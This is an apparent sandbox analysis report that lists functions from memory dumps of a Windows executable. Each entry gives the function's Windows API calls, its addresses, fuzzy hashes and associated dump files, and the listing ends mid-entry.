Opcode Fuzzy Hash: 31608f110d177412b6d68b6e1c36c0f32d83b3977d25d7f806c17d175a91f84d
Instruction Fuzzy Hash: CB11067BA48303BAFE146B20EC06DE773ECEF55320F200126FA00A50D1FBA56A615A55

Function 00A68F95 Relevance: 15.3, APIs: 10, Instructions: 324fileCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00A68FC1
CoInitialize.OLE32(00000000), ref: 00A68FEE
CoUninitialize.OLE32 ref: 00A68FF8
GetRunningObjectTable.OLE32(00000000,?), ref: 00A690F8
SetErrorMode.KERNEL32(00000001,00000029), ref: 00A69225
CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,00A83BDC), ref: 00A69259
CoGetObject.OLE32(?,00000000,00A83BDC,?), ref: 00A6927C
SetErrorMode.KERNEL32(00000000), ref: 00A6928F
SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00A6930F
VariantClear.OLEAUT32(?), ref: 00A6931F

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
String ID:
API String ID: 2395222682-0
Opcode ID: 2b0fceaea2f6d146ccdfccca0da69eebb99bbe9c6d6bfeb7c8dd7f6c72d50c28
Instruction ID: a843a34db51c394e4c61cff6ca158a83d5aab7435abbbe8f0d3f403ed60c6d48
Opcode Fuzzy Hash: 2b0fceaea2f6d146ccdfccca0da69eebb99bbe9c6d6bfeb7c8dd7f6c72d50c28
Instruction Fuzzy Hash: B1C110B1208305AF9740EF68C88496BB7F9BF89748F10491DF98A9B251DB71ED06CB52

Function 00A519CD Relevance: 15.1, APIs: 10, Instructions: 89threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00A519EF
GetForegroundWindow.USER32(00000000,?,?,?,?,?,00A50A67,?,00000001), ref: 00A51A03
GetWindowThreadProcessId.USER32(00000000), ref: 00A51A0A
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00A50A67,?,00000001), ref: 00A51A19
GetWindowThreadProcessId.USER32(?,00000000), ref: 00A51A2B
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00A50A67,?,00000001), ref: 00A51A44
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00A50A67,?,00000001), ref: 00A51A56
AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00A50A67,?,00000001), ref: 00A51A9B
AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00A50A67,?,00000001), ref: 00A51AB0
AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00A50A67,?,00000001), ref: 00A51ABB

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: Thread$AttachInput$Window$Process$CurrentForeground
String ID:
API String ID: 2156557900-0
Opcode ID: e8ebcb815b18bd44c2943d4eab5f766bb92f4c0d8c9b22323a1cb7261b372ce1
Instruction ID: fb67d63221061db23a756158fdba5e577895d91018756c0db893777dd70deb1e
Opcode Fuzzy Hash: e8ebcb815b18bd44c2943d4eab5f766bb92f4c0d8c9b22323a1cb7261b372ce1
Instruction Fuzzy Hash: 0831CE75501204AFDB22DFA8DC88F7977AEFB64356F104215FE00861A1DBB89D89CB10

Function 00A2C0E3 Relevance: 15.1, APIs: 10, Instructions: 59windowCOMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000008), ref: 009F260D
SetTextColor.GDI32(?,000000FF), ref: 009F2617
SetBkMode.GDI32(?,00000001), ref: 009F262C
GetStockObject.GDI32(00000005), ref: 009F2634
GetClientRect.USER32(?), ref: 00A2C0FC
SendMessageW.USER32(?,00001328,00000000,?), ref: 00A2C113
GetWindowDC.USER32(?), ref: 00A2C11F
GetPixel.GDI32(00000000,?,?), ref: 00A2C12E
ReleaseDC.USER32(?,00000000), ref: 00A2C140
GetSysColor.USER32(00000005), ref: 00A2C15E

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: Color$ClientMessageModeObjectPixelRectReleaseSendStockTextWindow
String ID:
API String ID: 3430376129-0
Opcode ID: 302656abd9628bfd4ec38fe15506c2d829ef7d5e3f6aa1816939d187608eea88
Instruction ID: 451a4144d72f10c9674acc5cb4df52b634554fb38d04df2f4fb65ce15f34d8f9
Opcode Fuzzy Hash: 302656abd9628bfd4ec38fe15506c2d829ef7d5e3f6aa1816939d187608eea88
Instruction Fuzzy Hash: 56113A32500245BFDBA19FA4EC49FE97BA5EF48331F104265FA65950E1CB710956EF20

Function 009FAD98 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 264comCOMMON

Download Yara Rule

APIs

mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 009FADE1
OleUninitialize.OLE32(?,00000000), ref: 009FAE80
UnregisterHotKey.USER32(?), ref: 009FAFD7
DestroyWindow.USER32(?), ref: 00A32F64
FreeLibrary.KERNEL32(?), ref: 00A32FC9
VirtualFree.KERNEL32(?,00000000,00008000), ref: 00A32FF6

Strings

close all, xrefs: 009FADDC

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
String ID: close all
API String ID: 469580280-3243417748
Opcode ID: 485b5ab5360fc9ac0ff09f2faac7e848d9e2158f50b6e54d1edbdd7824ce18d1
Instruction ID: 74fbccfb57bf156060d4569d83a1ef427fe3b01918141eb6c2796c6ce80310d0
Opcode Fuzzy Hash: 485b5ab5360fc9ac0ff09f2faac7e848d9e2158f50b6e54d1edbdd7824ce18d1
Instruction Fuzzy Hash: DBA169717052168FCB29EF54C995F69F364BF04700F1442ACF90AAB2A1DB31AD56CF91

Function 00A4AD69 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 241COMMON

Download Yara Rule

APIs

EnumChildWindows.USER32(?,00A4B13A), ref: 00A4B078

Strings

REGEXPCLASS, xrefs: 00A4AE3D
TEXT, xrefs: 00A4AFAF
CLASSNN, xrefs: 00A4AE1A
CLASS, xrefs: 00A4ADF7
NAME, xrefs: 00A4AEAA
INSTANCE, xrefs: 00A4AF86

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: ChildEnumWindows
String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
API String ID: 3555792229-1603158881
Opcode ID: c1622795f9e2c792e7b81e85c1d3d7663bcb52cb740af3e953bf8aa7dcaaa22e
Instruction ID: c013cfc9c1ec36df4049ad87f94800c52678980160ce3c4297c5943f6b072b6b
Opcode Fuzzy Hash: c1622795f9e2c792e7b81e85c1d3d7663bcb52cb740af3e953bf8aa7dcaaa22e
Instruction Fuzzy Hash: EF91E874600106EFDB58EF60C581BEEFB74BFA4300F548119E86AA7191DF30A99DCBA1

Function 009F31F6 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 186windowCOMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,000000EB), ref: 009F327E

Part of subcall function 009F218F: GetClientRect.USER32(?,?), ref: 009F21B8
Part of subcall function 009F218F: GetWindowRect.USER32(?,?), ref: 009F21F9
Part of subcall function 009F218F: ScreenToClient.USER32(?,?), ref: 009F2221

GetDC.USER32 ref: 00A2D073
SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00A2D086
SelectObject.GDI32(00000000,00000000), ref: 00A2D094
SelectObject.GDI32(00000000,00000000), ref: 00A2D0A9
ReleaseDC.USER32(?,00000000), ref: 00A2D0B1
MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00A2D13C

Strings

U, xrefs: 00A2D011

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
String ID: U
API String ID: 4009187628-3372436214
Opcode ID: f864b2461e91947ad2840b2edcf07b6c189258063cfdb95c6cd6574ce4192901
Instruction ID: 86e742d182a47474117d998dbd27c4a4d39812f362346e79bbe1bf9d48de4994
Opcode Fuzzy Hash: f864b2461e91947ad2840b2edcf07b6c189258063cfdb95c6cd6574ce4192901
Instruction Fuzzy Hash: 2671E130404219DFCF21CFA8D884AFA7BB5FF49320F148279EE565A1A7C7358992DB60

Function 00A7C634 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 149windowCOMMON

Download Yara Rule

APIs

Part of subcall function 009F29E2: GetWindowLongW.USER32(?,000000EB), ref: 009F29F3

Part of subcall function 009F2714: GetCursorPos.USER32(?), ref: 009F2727
Part of subcall function 009F2714: ScreenToClient.USER32(00AB77B0,?), ref: 009F2744
Part of subcall function 009F2714: GetAsyncKeyState.USER32(00000001), ref: 009F2769
Part of subcall function 009F2714: GetAsyncKeyState.USER32(00000002), ref: 009F2777

ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?), ref: 00A7C69C
ImageList_EndDrag.COMCTL32 ref: 00A7C6A2
ReleaseCapture.USER32 ref: 00A7C6A8
SetWindowTextW.USER32(?,00000000), ref: 00A7C752
SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00A7C765
DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?), ref: 00A7C847

Strings

@GUI_DRAGFILE, xrefs: 00A7C7DC
@GUI_DROPID, xrefs: 00A7C799

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
String ID: @GUI_DRAGFILE$@GUI_DROPID
API String ID: 1924731296-2107944366
Opcode ID: 62ad91957094197efc82370ce58962c8511e583c90ca53739f993e8505537619
Instruction ID: ce959e2e2e251e2bbd2452885fd9ca655253c32cc292efc85d87cc0da84f6036
Opcode Fuzzy Hash: 62ad91957094197efc82370ce58962c8511e583c90ca53739f993e8505537619
Instruction Fuzzy Hash: 21518D71604304AFD704EF54CC9AFAA7BE5FB88310F008A1DF599872E2DB70A955CB52

Function 00A620E1 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 134networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00A6211C
HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00A62148
InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 00A6218A
InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00A6219F
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00A621AC
HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 00A621DC
InternetCloseHandle.WININET(00000000), ref: 00A62223

Part of subcall function 00A62B4F: GetLastError.KERNEL32(?,?,00A61EE3,00000000,00000000,00000001), ref: 00A62B64
Part of subcall function 00A62B4F: SetEvent.KERNEL32(?,?,00A61EE3,00000000,00000000,00000001), ref: 00A62B79

Strings

, xrefs: 00A621CD

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorEventHandleInfoLastOpenSend
String ID:
API String ID: 2603140658-3916222277
Opcode ID: 92e6a89a46ff95a06b99f98d5e4c81397dd8059c55fdaea7e3bc915db73186c9
Instruction ID: 30a73aae998779cc2b0527a2c1c1a37a56e43318f8ae834cddfd6f75ccfb3676
Opcode Fuzzy Hash: 92e6a89a46ff95a06b99f98d5e4c81397dd8059c55fdaea7e3bc915db73186c9
Instruction Fuzzy Hash: 75417EB1501A18BFEB129F60CC89FFB7BBCEF08354F004116FA159A191D7749E458BA1

Function 00A69330 Relevance: 13.9, APIs: 9, Instructions: 438COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104,?,00A80980), ref: 00A69412
FreeLibrary.KERNEL32(00000000,00000001,00000000,?,00A80980), ref: 00A69446
QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00A695C0
SysFreeString.OLEAUT32(?), ref: 00A695EA

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: Free$FileLibraryModuleNamePathQueryStringType
String ID:
API String ID: 560350794-0
Opcode ID: ca0dad09837d07268fcccff3c7aa354ac8b2be2aff60ace341824ff501bbe22f
Instruction ID: 22e71d14e6f9be3353fc9734df270d683225b94db8686f2aab968d093c4b759f
Opcode Fuzzy Hash: ca0dad09837d07268fcccff3c7aa354ac8b2be2aff60ace341824ff501bbe22f
Instruction Fuzzy Hash: 5DF14D75A00209EFDF15DFA4C884EAEB7B9FF89314F108058F916AB251DB31AE46CB50

Function 00A6FD7D Relevance: 13.9, APIs: 9, Instructions: 386processCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00A6FD9E
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00A6FF31
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00A6FF55
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00A6FF95
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00A6FFB7
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00A70133
GetLastError.KERNEL32(00000000,00000001,00000000), ref: 00A70165
CloseHandle.KERNEL32(?), ref: 00A70194
CloseHandle.KERNEL32(?), ref: 00A7020B

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
String ID:
API String ID: 4090791747-0
Opcode ID: ecd24315202934ad0cbef97cdbcfc59ffd0b6e8d09d9567341e18dea530380e3
Instruction ID: 0eb13a6e0afb29f93a8b517d117d0ccad26b14933330295ba42447d8d2d5d4a4
Opcode Fuzzy Hash: ecd24315202934ad0cbef97cdbcfc59ffd0b6e8d09d9567341e18dea530380e3
Instruction Fuzzy Hash: FBE19C31204301DFC714EF24D991B6ABBE1BF89314F14896DF9999B2A2DB31EC45CB52

Function 00A5527C Relevance: 13.7, APIs: 9, Instructions: 170filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 00A54BC3: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00A53B8A,?), ref: 00A54BE0

Part of subcall function 00A54BC3: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00A53B8A,?), ref: 00A54BF9

Part of subcall function 00A54FEC: GetFileAttributesW.KERNEL32(?,00A53BFE), ref: 00A54FED

lstrcmpiW.KERNEL32(?,?), ref: 00A552FB
_wcscmp.LIBCMT ref: 00A55315
MoveFileW.KERNEL32(?,?), ref: 00A55330

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
String ID:
API String ID: 793581249-0
Opcode ID: 9d5a5d0b4e426f28048bf4fe5d9cbdd3e5dfbc9cfd27fc4d89df4811207654ad
Instruction ID: fb303c62bb6acb6d181d975f76fe45d66a66136bbfcc7efef24000823e8e6499
Opcode Fuzzy Hash: 9d5a5d0b4e426f28048bf4fe5d9cbdd3e5dfbc9cfd27fc4d89df4811207654ad
Instruction Fuzzy Hash: 865193B24083859BC764DBA4D9919DFB3ECAF84341F00091EF589C3092EF30E68D8766

Function 00A78C6A Relevance: 13.7, APIs: 9, Instructions: 168COMMON

Download Yara Rule

APIs

InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00A78D24

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: InvalidateRect
String ID:
API String ID: 634782764-0
Opcode ID: 714b9bb6a2d07fb40fa83dc8e6d2d9adc0c98d2fda84a9959f3ce30b814052d2
Instruction ID: 2d32733c7f405b500319096eafb7d5352a1cbfeb19644dbaeb13ffe1c7a1047a
Opcode Fuzzy Hash: 714b9bb6a2d07fb40fa83dc8e6d2d9adc0c98d2fda84a9959f3ce30b814052d2
Instruction Fuzzy Hash: AD51A030680204BFEF759B68CC8DBA97B65AF05360F24C511FA18E61E2CF79E990CB50

Function 009F2F42 Relevance: 13.7, APIs: 9, Instructions: 161windowCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 00A2C638
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00A2C65A
LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00A2C672
ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 00A2C690
SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00A2C6B1
DestroyIcon.USER32(00000000), ref: 00A2C6C0
SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00A2C6DD
DestroyIcon.USER32(?), ref: 00A2C6EC

Part of subcall function 00A7AAD4: DeleteObject.GDI32(00000000), ref: 00A7AB0D

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
String ID:
API String ID: 2819616528-0
Opcode ID: dd0dd07f929ee2bff7f476a8618cc6fe77d2295bfcf2b5deaaf2d8b9c2f2badf
Instruction ID: 613d5953778e48d94c66b376c9a343f0d2b81563fd7297cfc06adfd0e351d481
Opcode Fuzzy Hash: dd0dd07f929ee2bff7f476a8618cc6fe77d2295bfcf2b5deaaf2d8b9c2f2badf
Instruction Fuzzy Hash: B5517B70610209AFDB20DF68DD45FBA7BB5FB48720F104528FA46972A0D7B4ED91DB50

Function 00A4A226 Relevance: 13.6, APIs: 9, Instructions: 66sleepkeyboardwindowCOMMON

Download Yara Rule

APIs

Part of subcall function 00A4B52D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00A4B54D
Part of subcall function 00A4B52D: GetCurrentThreadId.KERNEL32 ref: 00A4B554
Part of subcall function 00A4B52D: AttachThreadInput.USER32(00000000,?,00A4A23B,?,00000001), ref: 00A4B55B

MapVirtualKeyW.USER32(00000025,00000000), ref: 00A4A246
PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00A4A263
Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 00A4A266
MapVirtualKeyW.USER32(00000025,00000000), ref: 00A4A26F
PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00A4A28D
Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00A4A290
MapVirtualKeyW.USER32(00000025,00000000), ref: 00A4A299
PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00A4A2B0
Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00A4A2B3

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
String ID:
API String ID: 2014098862-0
Opcode ID: a5c846ac27f00b800869de03116be09f10f1ab0c971a8ce59e8b396426139d5a
Instruction ID: 51f7cc8ff69efde673e674a65e87ad768ad323ce6d3dc654b3e933bae17137aa
Opcode Fuzzy Hash: a5c846ac27f00b800869de03116be09f10f1ab0c971a8ce59e8b396426139d5a
Instruction Fuzzy Hash: FC11E1B5950218BEF610AFA09C8AF6A7F2DEB8C760F100419F3406B0E0CAF35C519BB0

Function 00A494D9 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,00A4915A,00000B00,?,?), ref: 00A494E2
HeapAlloc.KERNEL32(00000000,?,00A4915A,00000B00,?,?), ref: 00A494E9
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00A4915A,00000B00,?,?), ref: 00A494FE
GetCurrentProcess.KERNEL32(?,00000000,?,00A4915A,00000B00,?,?), ref: 00A49506
DuplicateHandle.KERNEL32(00000000,?,00A4915A,00000B00,?,?), ref: 00A49509
